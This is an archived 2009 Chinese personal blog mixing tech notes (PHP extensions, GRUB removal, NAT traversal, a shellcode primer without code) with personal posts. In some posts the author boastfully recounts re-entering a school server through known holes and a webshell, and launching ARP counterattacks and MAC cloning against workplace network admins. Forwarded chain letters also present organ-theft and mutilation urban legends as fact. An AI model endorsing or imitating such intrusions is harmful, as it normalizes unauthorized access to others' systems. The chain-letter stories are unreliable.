2006年3月5日,Protection Technology 的一名雇员帖出了一个指向银河文明 II 的未授权下载源的连结,这是 由 StarDock 开发的一款未使用强制复制保护措施的游戏,该雇员此举意为证明游戏若缺失强制保护将导致的后果。[30]在 Internet 中引起大量关注之后,StarForce 随后为此举发表了道歉声明

Thursday, May 7, 2009

三访母校安全

应该说第二次访问的时候,管理员是很有进步的.服务器安全也比较变态.那此只是将程序通过调用系统rar打包了部分回来,昨天徒弟说他现在是团委站点的管理员,应他要求将团委站给他打个包.以前的shell我都删了,这次一看好多漏洞依旧,上个shell执行下发现服务器居然配置比以前垃圾了.所以我肯定以前的高手走了.其实他们应该请图书馆电子阅览室的老师给负责下安全.我在那里呆过,知道是有高手的,可惜最厉害的高老师早已远离尘世.

Monday, April 27, 2009

上周打包了两个程序

清理了一下移动硬盘,ARP软件居然好多,然后我将这些软件分解,将共同的DLL及其他东西分出来,然后做了个集合包括ARP攻击防护监控等多功能为一体的安装程序.同时也做了个PDF的集合程序.对打包压缩程序有了深入了解之后感觉写程序真的有点乐趣了,呵呵.

Thursday, April 9, 2009

jabber qq msn技术类站点收集

http://www.linuxboy.net/msnqq/016.html
http://tcpip2005.blogchina.com

预期网管的无耻成为现实

这个网管用的arp欺骗居然是从网关和内部DNS服务器上进行欺骗,现在99%的arp防护软件对这种网管的无耻
监控都没有效果,因为他们就是相信网关及对应的MAC却不能保证改MAC和IP上传来的信息是欺骗性质的.或许是偶得吧,现在我已完全突破网管的这种无耻监控,我的密码我的用户稍微能放心点.他一攻击我我就对网关发动反击,这样今天分部门的网管打电话告诉我说我的机器是不是中病毒了怎么对服务器进行攻击(日,她怎么不说他们网络部的几个人弄好几台机器对我进行各种形式的攻击呢,想让我上不了网,那么容易啊).不到3分钟我的MAC与IP就从他们的白名单策略里去掉了,终于让我上不了网了,呵呵colone the mac and ip ,我继续上,这哥们对我发动了20多W次的arp攻击及各种冲突欺骗攻击,可惜没作用,我就鄙视那帮装B的网管,成天封这个折腾那个,我要是有时间没事就消磨你们这帮孙子.

过两天就回家看侄子去了

这小家伙见着我会是什么反映呢,呵呵!

Wednesday, April 8, 2009

一句很有意义的话

昨天听新东方刘畅单词里他说:上帝是无耻的,要想成功你要比他更无耻更流氓!

Saturday, April 4, 2009

联系上静子MM了

这小丫头说我说话都没以前利索了,我相信这是真的,在这个如同孤岛一般的地方,那里来的交流环境或与高人切磋,不切磋则退步.再说小丫头现在也厉害了,呵呵不过还是当年的那个超可爱!

Wednesday, March 25, 2009

电动葫芦的历史

国产电动葫芦是从上世纪50年代以仿造形式开始生产与发展的。1949年7月上海通用机器厂最先试制成功仿德国DEMAG公司K型1.5t和3t一般用途钢丝绳电动葫芦,并投入小批量生产,但该厂于1954年转产汽轮机。1953年天津起重设备厂(原天津第七机械厂)仿原苏联40年代TB型葫芦试制了1t和2t一般用途钢丝绳电动葫芦,定型为TV型电动葫芦。1954年又试制了3t和5t葫芦,1957年完成了0.25t~5t系列产品的修改设计与生产,从此TV已作为我国第一代葫芦而出现。

以葫芦为起升机构的电动单梁起重机,国内以天津起重设备厂为最早仿造原苏联40年代HK型桁架式单梁起重机,1954年开始试制,1956年批量生产,1957年由天津起重设备厂与北京起重机器厂联合对生产图纸进行了第一次修改,定型为A571型(1957年第一次整顿),为我国第一代电动单梁起重机,一直生产到1987年才被淘汰而停产(1987年1月起不准再生产)。

以葫芦为起升机构的电动单梁悬挂起重机,国内仍以天津起重设备厂为最早仿造原苏联40年代∏K型桁架式单梁起重机,并进行了系列生产,为我国第一代电动单梁悬挂起重机,也一直生产到1987年才被淘汰而停产(1987年1月起不准再生产)。

1963年开始天津起重设备厂设计生产了防爆型电动葫芦,并相继出现了防爆电动单梁和悬挂起重机系列产品。1964年又开始由天津起重设备厂、上海起重设备厂、重庆起重机厂、定西起重机厂、西安起重机厂、沈阳起重机厂和北京起重运输机械研究所联合设计、试制并开始生产CD、MD型系列葫芦,CD、MD型葫芦为我国第二代葫芦,是目前的主流产品。

A571型电动单聊起重机和∏K型电动单梁悬挂起重机与CD、MD型葫芦配套使用,由于结构和性能等原因存在不少问题。1974年由天津起重设备厂对A571型电动单梁起重机和K电动单梁悬挂起重机进行了更新,自行设计生产了配用CD、MD型葫芦的DL型电动单梁起重机和DX型电动单梁悬挂起重机。1976年在DL型和DX型产品基础上经天津起重设备厂、开源起重机厂、重庆起重机厂、长沙起重机厂、洛阳起重机厂和北京起重运输机械研究所联合设计试制与生产,1977年定型为LD型电动单梁起重机和LX型电动单梁悬挂起重机,成为我国第二代电动单梁起重机和悬挂起重机产品,一直生产至今仍为国内主导产品。上世纪70年代我国又相继开发了LB型防爆电动单梁起重机、LXB型防爆电动单梁悬挂起重机以及LH型电动葫芦双梁起重机系列产品等。

从上世纪70年代末到80年代初,葫芦式起重机已进入到一个引进开发的新阶段。天津起重设备厂引进了德国STAHL公司的AS型全系列钢丝绳电动葫芦技术;南京起重机械厂、北京起重设备厂和山海关起重设备厂三家联合引进了德国DEMAG公司的环链葫芦技术;进入80年代中期,以南京起重机械长为主联合设计开发了H型钢丝绳电动葫芦,重庆起重机厂为主联合设计开发了葫芦门式起重机系列产品。引进的AS型葫芦技术具有80年代世界先进水平,我国的第三代葫芦必将以AS型为代表。

LH型电动葫芦双梁起重机则是在70年代以武汉起重机厂为代表,自行开发设计的HC性电动葫芦作为起升机构的我国第一代电动葫芦双梁起重机

Monday, March 23, 2009

怀疑有人肉的香肠

昨天同事从北京商场买回来的腊肠,我吃一半恶心的差点饭都没吃.我吃着吃着,有一块怎么嚼也嚼不动,我拿出来一看,第一反映就是这是块头皮,头发丝的细密度,粗细决定了这绝对不是黑色的猪肉.我悄悄的将剩下的大半截扔了.或许我心理做怪,但是我坚定不吃感觉不好的东西.

骗局

1)建行一同志转送:今天经过一栋大楼门口,门口有一提款机。有一个老伯,一直看著我走过他身边,突然叫住我。他说他不识字,拿一张提款卡要我帮他在大楼门口的自动提款机取钱。我回答我无法帮你取,叫警卫帮你。结果,他就回答我说不用了,继续找其他路人帮他取钱。朋友们要记住---取款机可是有摄影机耶。万一他说我抢劫或是偷他的提款卡,甚至他的卡片是偷来的,帮他领钱会在提款机留下影像,绝对会让你百口莫辩!我会警惕!是因为已有同事上当,目前仍官司缠身。显然这是诈骗集团在找替身了!请用力传出去~~~骗案真是层出不穷,一不小心就会踏入陷阱,真是令人防不胜防!提醒各位朋友在外多小心!

2)芍药居一业主,家中突然断电,看到窗户外别人家里都有电,就出门查看自家电表箱,打开门就被刀子顶着了——持刀入室抢劫伤人家里突然断电,不要贸然就开门查看,有猫眼的多观察一会门外动静,没猫眼的也隔着门静听一段时间,没有异常响动再开门。

(3)各位女同胞们注意了!这是最新骗局
女同胞请注意男同胞请叫自己的朋友注意新出的情况,女性朋友要特别注意啦:
一位上班的小姐在下班回家的路上看到一个小孩子一直哭,很可怜,然后就过去问那小朋友怎么了.小朋友就跟那个小姐说:""我迷路了,可以请你带我回家吗?""然后拿一张纸条给她看,说那是他家地址.然后她就笨笨的带小孩子去了.一般人都有同情心,然后带到那个所谓小孩子的家里以后,她一按铃,门铃像是有高压电,就失去知觉了.隔天醒来就被脱光光在一间空屋里,身边什么都没有了,她甚至连犯人长啥样子都没看见.所以,现在人犯案都是利用同情心啊,如果遇到类似这种的,千万别带他去,要带就带他到派出所去好了,走丢的小孩放到派出所一定没错啦,请通知身边所有女性,为了广大女士的安全,看完后麻烦给转发给所有人。

4)今天遇到讨饭新招,大家注意提防了~~
今天在家休息,有人按门铃,开门一看,是个50来岁的老妇女,手里拿了2包喜糖,我还以为是邻居来分喜糖的,结果一开口,听得出不是本地人,她说什么这2包糖给我们的,图个喜气,要换一点钱给她,后面还说了一大堆不知道什么,我也没听清楚,感觉就是不对,吓的马上关门,晕!这年头,还有这么讨钱的一招。

(5)转发:大家注意了!到自动取款机取钱时一定要倍加小心!!!!!
昨晚在金海里的工行自动取款机取钱时,后面来了个老妇女,问我能不能取钱,还说什么取款机有个键可能坏了,旁边不知什么时候来了个小女孩,一直想我身边跻,我也没在意,小孩子淘气嘛,可是过分的是她竟然把手朝出钞口放,准备拿我的钱了,我感觉不对劲了,立即把她推到一边,等着把钱取出来。之后我想了一下,她们俩给我设了个套:老妇女负责和我瞎聊,吸引我的注意力,小女孩趁我不注意时抢走我的钱!如果我不防备的话,钱说不定就被抢走了,这样的话,我就进套了:(一则我立即去追小女孩,去追回我的钱,可是谁又会相信一个小女孩能抢我一个大人的钱呢?更可怕的是站在我后面的老妇女将会取光我卡中所有的钱,因为我的卡还在取款机里面;二则我不立即去追小女孩,等拿到卡再追,到那时小女孩就无影无踪了,钱也就没了啊:(她们真的很""聪明"",很可耻的!!!)
这是我的亲身经历,希望大家以后取钱时一定要警惕起来,注意观察周围的所有人,并转告周围的家人、同事、朋友,让坏蛋分子没有可乘之机!!!!又出现骗局新招!!

(6)我父母都退休在家。昨天上午,来一陌生中年人,说自己摩托车油开没了,加油站太远,摩托车又太重推不动,所以想问我父母要一个可乐瓶去买汽油,刚开口就说实在不行就出2、3元买一个空瓶好了。我母亲就拿了个空瓶给他,别说他还真从口袋里掏出钱来,不过是几张百元大钞,还让我父母找钱。我母亲顿生警觉,说算了,不过是一个空瓶而已。他见我母亲不上钩又左右张望,发现我家在装修时用过的一把刷墙的刷子,说这个不错,他愿意出10元钱买下来,只不过还是那张百元大钞。好在我母亲尚未龙钟,也不是那种爱贪小便宜的人
女性朋友一定要认真看完,注意自我安全啊,现在万恶的社会。。。。朋友发给我一篇报道,现转给各位看看,出门在外,千万小心

(7)一对新婚夫妇到巴黎度蜜月。在巴黎,妻子在一间时尚服装店试衣服,身为丈夫就在试衣间外等候。但等候多时却不见妻子走出来,紧张的丈夫要求店员帮忙到里头查看,却意外发现试衣间空无一人。丈夫以为妻子开玩笑作弄人,要他紧张.于是回到酒店等她回来。几小时后却不见妻子的踪影,才知事态严重。丈夫赶忙报警,并到巴黎所有服装店和医院询问妻子下落。三星期过去了,妻子犹如从人间蒸发,音讯全无,伤心的丈夫只能收拾包袱回到**。由于无法从绝望中振作,丈夫无心工作,甚至独自生活,决定把自己放逐,流浪到各地方。几年后,他心血来潮到巴厘岛,在一破旧的屋子参观一畸形秀(FREAKSHOW)。他见到一脏生锈的铁笼里,有一女人四肢全无,身躯,包括脸部,犹如破布般残破,充满疤痕。她在地上扭曲着,并发出有如野兽般的呻吟声。突然间男人惊恐地发出尖叫声。他从那毫无人样的女人脸上见到,他再熟悉不过,属于他新婚不久就告失踪的妻子脸上的红色胎记。

(8)另一版本则发生在上海。几年前一女通知公安她的表妹在上海市集购物时无故失踪,可是遍寻不着,直到五年后一友人撞见这表妹在泰国曼谷街道上行乞。恐怖的是她不知何故没了双手双脚,身子被铁链绑在灯柱旁。

(9)这是在某一对夫妇去香港游玩时发生的故事。一对夫妻不知不觉走入了全香港治安最坏的地区的一家精品店里?妻子对店里的衣服样式十分喜欢,随后就进入试衣间试衣。可是,先生在外头等了又等,却不见妻子出来。由于实在是等太久了,所以先生开门进去找她,可是试衣间里早已空空如也。他吃惊地向店员询问妻子到哪里去了,可是店员们却好象是串通好了一样,都说没有看见,并坚持根本没有象他妻子这样的人来过店里。因此他只好请当地的警察协助搜索这家精品店,可是却一无所获。后来他又一个人找了一段时间,直到他的签证到期。最后不得已他就在找不到妻子的情况下回国了。之后经过了一年…他向公司请了一段长假,再一次回到香港去找他的妻子。他带着妻子的相片走遍香港的大街小巷,但这次仍是一点线索也没有。终于假期就要结束了,他身心疲惫地开始考虑要回国的时候,有一天无意间经过了一间珍奇小屋。小屋的看板上写着:""达磨""(不倒翁)虽然他对珍奇事物并不感兴趣,但由于连日疲劳他想让自己改变一下心情,加上看板上写着""达磨""的文字也引起他的兴趣。最后他决定进去瞧瞧。但是他不该进去的!因为珍奇小屋里面展出一件令他惨不忍睹的东hellip;小屋里的舞台上有一位手脚都被切断的全裸女性被当成花瓶一样摆在那里!这位女性的舌头已经被拔掉了,不断发出奇怪的呻吟声。看到这么恶心的东西真令他恨不得马上拔腿就跑,但不知为什么他心里感受到一股奇怪的气氛,于是他又重新仔细看那女人的面孔hellip;没错!这女人正是他一年前失踪的妻子。后来,他向当地的黑道支付庞大的赎金换取妻子的剩下的躯干。但一切都太迟了,他可怜的妻子早就已经疯了。现在她还住在国内某家医院,继续不断地发出奇怪的呻吟声hellip;

(10)最近有人告诉我,他的朋友在晚上听到门口有婴儿在哭,不过当时已很晚了,而且她认为这件事很奇怪,于是她打电话给警察。警察告诉她∶"无论如何,绝对不要开门。"这位女士表示那声音听起来象是婴儿爬到窗户附近哭,她担心婴儿会爬到街上,被车子碾过。警察告诉她∶我们已派人前往,无论如何不能开门。警方认为这是一个连续杀人犯,利用婴儿哭声的录音带,诱使女性以为有人在外面遗弃婴儿,她们出门察看。虽然尚未证实此事,但是警方已接到许多女性打电话来说,他们晚上独自在家时,听到门外有婴儿的哭声,请将这个消息传给其他人,不要因为听到婴儿的哭声而开门。
请严肃看待这贴子!绝不离谱!小心为妙!!!
以前听说大活人现场失踪,后来被卖到马戏团、被卖器官什么的,只当是天方夜谭。结果真的看到发生在真 实中的恐怖故事。

(11)事情是同事群发邮件告知的。她的朋友,简称小A吧,上周和两个女孩子,简称小B和小C,去逛罗湖商业城。罗湖商业城是深圳假货集散地,龙蛇混杂,紧靠深圳火车站和香港的罗湖口岸,人流量非常大。话说小C内急,就去上卫生间,小A和小B在洗手间外面等。等了很久很久,还是不见小C出来,两个人有点奇怪了。于是两个人进去催她。谁知道进去一看,人影全无。两个人倒竖一口冷气,打手机也没人接。一个大活人,难道就这么活不见人死不见尸的失踪了?于是赶紧报警。警察来了,问情事情经过以后,说了一句令人无比毛骨悚然的话,"你们有没有看见其他可疑的人进去?",两个人再三回忆,没有。因为不可能带着一个活生生的100多斤的人出来,而她们不注意。这时候小A突然想起来,其间有个清洁工打扮的人推着一辆清洁小车进去、接着又出来……警察告诉他们,这种事情已经不是第一次发生,现在深圳警方初步怀疑一个犯罪团伙,有组织地在管理疏松的低档商业城,利用人们,尤其是女性对清洁工没有防范意识的心理,进行有组织地绑架、贩卖人体器官犯罪。别忘了,罗湖商业城离香港和深圳火车站有多么地近。现在已经几天过去了,那个可怜的小C姑娘,仍是活不见人死不见尸。我的同事说,小A,也就是我同事的朋友,仍在等小C的消息。但是很可能,也许如果幸运的话,活着的小C会被扔在哪个角落,只是失去了她的肾,但是,更有可能的是,也许再过几天或者几个月、几年,小C的头颅和躯体、四肢会在深圳的城乡结合部的LJ堆被人发现。如果看到这个发生在身边的活生生的恐怖事件,请转告身边的女性亲友,一定小心防范清洁工打扮的人,因为他/她很可能会趁你不注意把你敲晕,放进清洁车拉走,接下来等着你的是无比恐怖的活人分尸

关于医术与巫术

昨天偶尔看了一个印度的恐怖片,其中有一句话很经典:你感冒了吃什么,那么你知道这药的成分吗,知道他们的作用吗?
从这里我们可以问巫术是不是就是蒙骗呢?其实原理都一样吧,只不过是通过化学刺激与其他的直接作用与神经的刺激.前几天看过关于江西五百钱的说法.感觉生者有好多医术之外的东西,艺术不能保我健康阳光心态,医术不能让我健康朝气.那么这些潜在的东西是更深层的东西,医术可以说只关乎表而已.现在开始相信道家所说和佛家所说的很多思想,思想可以从四面八方观望.

Friday, March 20, 2009

终于解决无线上网不稳定的问题了

用系统自带的设置,在WPE或者不加密的情况下基本上很正常,信号还不错,但是一到WPA就玩完了个屁的,这次就用硬件官方的管理工具,连接效果超级好,一个IBM一个asus及toshiba都如此设置均得到超级好的效果.

Tuesday, March 17, 2009

感觉网络监管力度在加大

现在好多站点,或论坛都被禁止访问,起初以为是我们公司的网管故意控制我的访问呢,经常是我访问一个站点之后再点3-4次该站就被封,发现用ADSL上网也有这种情况发生.而且昨天听说网监局还问 一个安全站点的站长要服务器用户名和密码,说要安监控插件.现在基本上是除了几个门户站,其他站点逐渐都不可访问了.

为一个网名狂不爽

NND那个腾讯我现在用的qq没有申请qq空间,访问别人的空间,显示的用户是个什么:"真心对爱",日哦我那里取名取这样的,纯属消遣我,我翻啊翻啊,翻他腾讯姥姥个底朝天,结果也没找到原因和修改的地方,我就不明白从来没起过这样的名字居然跑出这个名字,怀疑是哪个垃圾申请号不用被疼寻收回,结果疼寻他妈病了没有及时吃药造成不更新,不refresh.疼寻这比真不兢业只能这么说.

phplib

refer url:http://cn.php.net/manual/zh/install.windows.extensions.php
在 Windows 下安装完 PHP 和 web 服务器之后,可能想要安装一些扩展库来获得更多功能。可以通过修改 php.ini 来选择当 PHP 启动时加载哪些扩展库。也可以在脚本中通过使用 dl() 来动态加载。
PHP 扩展库的 DLL 文件都具有 php_ 前缀。
很多扩展库都内置于 Windows 版的 PHP 之中。这意味着要加载这些扩展库不需要额外的 DLL 文件和 extension 配置指令。Windows 下的 PHP 扩展库列表列出了需要或曾经需要额外 PHP DLL 文件的扩展库。下面是内置的扩展库列表:
PHP 4 中(截止到 PHP 4.3.11):BCMathCaledarCOMCtypeFTPMySQLODBCOverloadPCRESessionTokenizerWDDXXMLZlib
PHP 5 中(截止到 5.0.4)有以下修改。新增内置:DOMLibXMLIconvSimpleXMLSPLSQLite。以下不再内置:MySQLOverload
PHP 搜索扩展库的默认位置在 PHP 4 中是 C:\php4\extensions,在 PHP 5 中是 C:\php5。要修改此项以符合用户自己的 PHP 设置,需要编辑 php.ini 文件:
需要修改 extension_dir 设置以指向用户放置扩展库的目录或者说放置 php_*.dll 文件的位置。例如:
extension_dir = C:\php\extensions
要在 php.ini 中启用某扩展库,需要去掉该行 extension=php_*.dll 前的注释符号,将想要加载的扩展库前的分号(;)删除即可。
Example#1 启用 Bzip2 扩展库
// 将这一行
;extension=php_bz2.dll
// 改成这样
extension=php_bz2.dll
有些扩展库需要额外的 DLL 才能工作。其中一部分包括在发行包里,PHP 4 中在 C:\php\dlls\ 目录下,PHP 5 中在主目录下,但还有一些,例如 Oracle(php_oci8.dll)所需要的 DLL 没有绑定在发行包里。如果安装 PHP 4,将绑定的 DLL 从 C:\php\dlls 拷贝到主目录 C:\php 中。别忘了将 C:\php 放到系统路径 PATH 中去(此过程在另外的 FAQ 条目中有说明)。
某些 DLL 没有绑定在 PHP 发行包中,详情见每个扩展库的文档页。此外有关 PECL 的说明见手册页 PECL 扩展库安装。在 PECL 中有日益增加数目巨大的 PHP 扩展库,这些扩展库需要单独下载
Note: 如果运行服务器模块版的 PHP,在修改了 php.ini 之后别忘了重新启动 web 服务器以使其改动生效。
在PHP的文档里都有,所以不说了,下载地址官方就有不说了!

linux转xp时候出现grub

实际操作下面这些东西都不可用,不成功,没有专业的引导与MBR管理工具没办法.
解决方法:
1: 概要
本文介绍如何从主启动记录 (MBR) 中删除 GRUB 启动管理器。
更多信息
如果您的计算机上安装了 GRUB,Linux 可以通过 GRUB 启动管理器直接加载到 MBR,可以让计算机实现双启动。要删除 GRUB,请执行以下步骤:
1.插入安装 CD 并重新启动计算机。如果出现提示,请选择从该 CD 启动时所需的所有选项。
2.当开始基于文本部分的安装时,请按照提示,按 R 键选择修复或恢复选项。
3.如果有双重引导或多重引导系统,请从故障恢复控制台选择要访问的驱动器。
4.当出现提示符时,输入 Administrator 密码。
5.在系统提示符中,键入 FIXMBR 命令:FIXMBR→Enter,Y→Enter。
6.重新启动:EXIT→Enter 并取出光盘。
附:FIXMBR 命令使用说明
Fixmbr修复启动磁盘的 主启动记录。fixmbr 命令仅在使用故障恢复控制台时才可用。
fixmbr [device_name]
参数
device_name
要写入新的主引导记录的设备(驱动器)。设备名称可从 map 命令的输出获得。例如,设备名称:
DeviceHardDisk0
范例
下列命令示例向指定设备写入一个新的主引导记录:
fixmbr DeviceHardDisk0
注意
·如果不指定 device_name,新的主引导记录将被写入引导设备,即装载主系统的驱动器。
·如果系统检测到无效或非标准分区表标记,将提示用户是否继续执行该命令。除非您访问驱动器有问题,否则不要继续进行。向系统分区写入新的主引导记录可能破坏分区表并导致分区无法访问。
2:
一次因为想重新安装FC5,所以在Windows下直接将Linux分区删除了,因为是green hand所以智商低。这下重新启动Windows都不行了,因为没有删除Grub。查询Grub的命令后,成功进入了Windows,并删除了Grub。
每次计算机启动都会进入grub>状态,这是如何启动Windows呢?按照如下顺序键入命令:
1: rootnoverify (hd0,0) //如果操作系统装载了第一块硬盘的第一个分区上,否则更改参数,如(hd1,1)--安装在第二块硬盘的第二个分区上了。 2: chainloader (hd0,0)+1 3: boot 或者 root (hd0,0)或者root (hd0,1),..... 4: 进入Windows后,运行clsmbr.exe工具,直接清楚MBR。

3:
是不是想让系统直接启动到Windows,不出现Linux的Grub(或LILO)引导界面(Solution 1~3),或者是在Windows中删除了Linux分区后无法正确启动Windows,而停留在"grub>"提示符处,怎么办(Solution 4)? 请往下看,这里给你提供几种实用的方法:
Solution 1
用DOS命令fdisk恢复主引导扇区MBR(Main/Master Boot Record)
---用win98的引导盘或DOS引导盘引导系统到纯DOS提示符下,执行:"fdisk /mbr"即可。
Solution 2
在Linux系统中,恢复MBR。(如果你还能登陆到Linux系统中的话)
---在终端的命令提示符后输入: "dd if=/boot/boot.NNNN of=/dev/hda bs=446 count=1"
注意,其中bs(buffer size)是指重写的字节数。为什么不是512呢?主引导扇区是一个扇区(512字节呀),因为我们只是想通过扇面的命令修复系统MBR的引导或删除Grub/LILO引导;而不是恢复整个主引导扇区。所以我们只把主引导扇区的备份文件boot.NNNN的前446个字节重写入主引导扇区。 boot.NNNN是我们在安装Linux之前整个主引导分区的备份。如果我们把512个字节全部写入主引导扇区就可能会把安装了Linux后改变了的硬盘DPT表也破坏掉。那就坏事了!!! (MBR的512字节中前446字节为引导程序,紧跟着后面64字节为分区表,最后面2个字节为结束标记)
Solution 3
如果你的fdisk不好使,或者Linux已经翘翘了,不用着急,上帝关上了所有的门,但是他一定会为你留下一扇窗户,下面的工具可意帮助你:
Clear MBR 0.9:
---直接运行执行"Clear MBR"即可,本人有测试过,绝对安全,敬请放心使用。
Solution 4
Linux的分区已经被你从Windows中删除,系统启动后停在"grub>"提示符处。(方法一:按照Solution 1的方法,方法二:如下)
---在"grub>"提示符后输入:"rootnoverify (hd0,0)" 回车。 //将第一块硬盘(hd0)的第一个分区(0)设为根分区/root设备,但不加载文件系统。
---在"grub>"提示符后输入:"chainloader +1" 回车。//将启动引导权转交给当前分区的首扇区(Windows系统所在分区的首扇区)。
---在"grub>"提示符后输入:"boot" 回车。系统将启动Windows。如果不成功,则表明 (hd0,0) 不是 Windows 系统所在分区,再从第一步开始试一下"root (hd0,1)/root (hd0,2)/root (hd0,3)/...",总之这样一定可以引导启动你的Windows系统。

4:最简单的办法是找张具有多系统引导修复功能的光盘去修复。

Sunday, March 15, 2009

p2p&nat

穿越NAT的意义:
    NAT是为了节省IP地址而设计的,但它隐藏了内网机器的地址,"意外"起到了安全的作用。对外不可见,不透明的内部网络也与互联网的"公平"应用,"相互共享"的思想所不容,尤其是P2P网络中"相互服务"的宗旨,所以穿越NAT,让众多内部网络的机器也参与到P2P网络中的大集体中来,一直是P2P开发者的所希望的。穿越NAT需要借助外部的支持,说白了就是"内外勾结",骗过NAT。很多P2P网络成功地实现了这一目标,但还是有一些"遗憾"---并非所有的情况下都可以。由于客户端是主动登录P2P网络才可穿越,所以P2P的方式也没有违背企业的内部管理原则,毕竟"自由世界"的加入都是自觉自愿的。
 
NAT原理:
NAT(Network Address Translation)网络地址转换/网络地址翻译。
工作原理:NAT主要的通过对数据包头的地址替换来完成内网计算机访问外网服务的。当内部机器要访问外部网络时,NAT设备把内部的IP1与端口号1(网络层地址与传输层地址),转换成NAT的外部IP2与新的端口号2,再送给外部网络,数据返回时,再把目的为IP2:端口2的数据包替换为IP1:端口1,送给内网机器。若通讯协议的内容中有IP地址的传递,如FTP协议,NAT在翻译时还要注意数据包内涉及协议地址交互的地方也要替换,否则协议就会出现地址混乱。在NAT设备中维护了这个要替换地址的映射表,并根据内部计算机的通讯需求维护该表。外部网络来数据包能否进入NAT,主要是看是否已经有可映射的表项,若没有就会丢弃。
 
NAT的外部公网地址可以是一个IP,也可以是一个网段,形成地址池。NAT还可以把某个外网地址直接影射给内网的某个服务器,让外网的用户可以直接访问到这台服务器。NAT的工作的隐藏内网的机器,但允许内网主动打开到外网的通讯"通道",也就是建立映射表项。
NATP2P带来的问题是:NAT只允许单方面发起连接,通讯的双方不是平等的,P2P网络的基础有了问题,具体的表现为:
n         内网主机IP是私有的,外部主机看不到,也无法主动发起连接
n         即使知道了内网IP,但NAT会丢弃没有在影射表的数据包
n         内网主机可以作为客户端访问外网,但不能作为服务器提供服务
n         当两个主机都位于各自的NAT之后,要实现P2P的连接,就不仅是谁主动的问题,而是如何解决在两个NAT上同时有对方映射表项的问题。
 
STUN协议(IETF RFC 3489)
STUN协议是一种通道协议,可以作为正式通讯前的通路建立,它采用的是用户终端干预的一种方法,可以解决应用协议内部传递IP地址给NAT带来的麻烦。用户通过其他方法得到其地址对应在NAT出口上的对外地址,然后在报文负载中所描述的地址信息就直接填写NAT上对外地址,而不是内网的私有IP,这样报文的内容在经过NAT时就按普通的NAT流程转换报文头部的IP地址即可,负载内的IP地址信息无需再修改。利用STUN的思路可以穿越NATSTUN协议是客户端/服务器协议,分两种请求方式:一是UDP发送的绑定请求(Binding Requests),二是TCP发送的秘密请求(Shared Secret Requests)。绑定请求用于确定NAT分配的绑定地址。
STUN标准中,根据内部终端的地址(P:p)NAT出口的公网地址(A:b)的影射方式,把NAT分为四种类型:
1.         Full Cone:来自相同的内部地址的请求消息映射为相同的外部地址,与外部地址(目的地址)无关。映射关系为P:p↔A:b,任何外部主机可通过(A:b)发送到数据到(P:p)上。
2.         Restricted Cone:来自相同的内部地址的请求消息映射为相同的外部地址,返回的数据只接受该内部节点曾发数据的那个目的计算机地址X。映射关系为P:p↔A:b↔X,只有来自X的数据包才可通过(A:b)发送到数据到(P:p)上。
3.         Port Restricted Cone:来自相同的内部地址的请求消息映射为相同的外部地址,返回的数据只接受该内部节点曾发数据的那个目的地址X:x。映射关系为P:p↔A:b↔X:x,只有来自X:x的数据包才可通过(A:b)发送到数据到(P:p)上。
4.         Symmetric(对称) NAT:只有来自相同的内部地址(P:p),并且发送到同一个地址(X:x) 的请求消息,才被映射为相同的外部地址(A:b),返回的数据只接受该内部节点曾发数据的那个目的地址X:x。映射关系为P:p↔A:b↔X:x,当(P:p)访问(Y:y)时,映射为P:p↔B:c↔Y:y
 
P2P利用STUN穿越NAT
位于NAT后面终端AB要穿越NAT直接通讯,可以借助在公网上的第三者Server来帮助。
穿越NAT的情况分为为两种方式:1、一方在NAT之后,一方在公网上。这种情况相对简单,只要让NAT之后的终端先发起通讯,NAT就没有作用了,它可以从Server上取得另一个Peer的地址,主动连接,回来的数据包就可以方便地穿越NAT2、双方都在NAT之后,连接的成功与否与两个NAT的类型有关。主要的思路的先通过终端与Server的连接,获得两个终端在NAT外部的地址(IP与端口号),再由终端向对方的外部地址发邀请包,获取自己与对方通讯的外部地址,俗称为"打洞"。关键是获取了NAT外部映射的地址,就可以发包直接沟通,建立连接。但当一方是对称型,另一方是Port Restricted或对称型时,无法有效获取外部地址,邀请包无法到达对方,也就无法穿越NAT。具体的分析可以根据两个NAT的类型分成若干情况分析,这里给一般的穿越例子。
实例:UDP穿越NAT
Ø         A登录ServerNAT A分配端口11000Server得到A的地址为100.10.10.10:11000
Ø         B登录ServerNAT B分配端口22000Server得到B的地址为200.20.20.20:22000
Ø         此时B会把直接来自A的包丢弃,所以要在NAT B上打一个方向为A的洞,那么A就可以向200.20.20.20:22000发送数据了
Ø         打洞的指令来自ServerBA的地址100.10.10.10:11000发一个UDP报文,被NAT A丢弃,但在NAT B上建立映射记录,NAT B不在丢弃来自A的报文。
Ø         Server通知A可以通讯,A发起数据UDP包给BNAT B放行,B收到A的包,双方开始通讯
注:若是对称NAT,当BA打洞的端口要重新分配(NAT A不会再分配11000端口)B无法获取这个端口,所以不适用本方法。
实例:TCP穿越NAT
Ø         A登录ServerNAT A分配端口11000Server得到A的地址为100.10.10.10:11000
Ø         B登录ServerNAT B分配端口22000Server得到B的地址为200.20.20.20:22000
Ø         AB发送TCP数据包SYN:192.168.10.11:1234=>200.20.20.20:22000,在NAT A上打洞
Ø         BA发送TCP数据包SYN:192.168.20.22:1234=>100.10.10.10:11000,在NAT B上打洞
Ø         通道建立,AB三次握手建立TCP连接
文章来源:zhaisj.blog.51cto.com/219066/58651

shell code 概叙

 对于初期接触网络安全的人来说,Shellcode是很神秘的东西,对于网络攻击过程中的嗅探信息、漏洞剖析都是可以理解的,但真正利用漏洞入侵时,通过把一段二进制码送入后并执行,就可以获得目标机器的控制权,之后的事情是属于爱好者学习技术,还是黑客的行为,就看攻击者的一念之差了。Shellcode就好象神秘的武器,安全防护变得如此不堪一击。Shellcode究竟是什么样的程序?是什么特殊代码?如何才能学会编写?我下面收集了几类常见的Shellcode,主要是学习使用。它其实也是一般的软件程序,主要是因为二进制码的"不可读性",增加了神秘色彩。
 
    Shellcode是指能完成特殊任务的自包含的二进制代码,根据不同的任务可能是发出一条系统调用或建立一个高权限的Shell,Shellcode也就由此得名。它的最终目的是取得目标机器的控制权,所以一般被攻击者利用系统的漏洞送入系统中执行,从而获取特殊权限的执行环境,或给自己设立有特权的帐户。Shellcode因操作系统有一些差异,这里以Linux为例。
    Shellcode是一段高技巧的软件代码,为了小而精,一般直接写为16进制的操作码,当然编写者一般采用C或汇编编写,然后通过汇编程序成为16进制的操作码。
 
1、获取特殊权限:攻击的目标通常是某个SUID(具有高权限的系统程序)程序,因为它可以具有较高的特权去执行一些命令(比如修口令等),好的SUID程序会在不必要时放弃过高的特权,需要时再重新设置获取特权。Setreuid是用来设置(恢复)进程的真实和有效的用户ID。当然也就可以设置root(0)的权限。
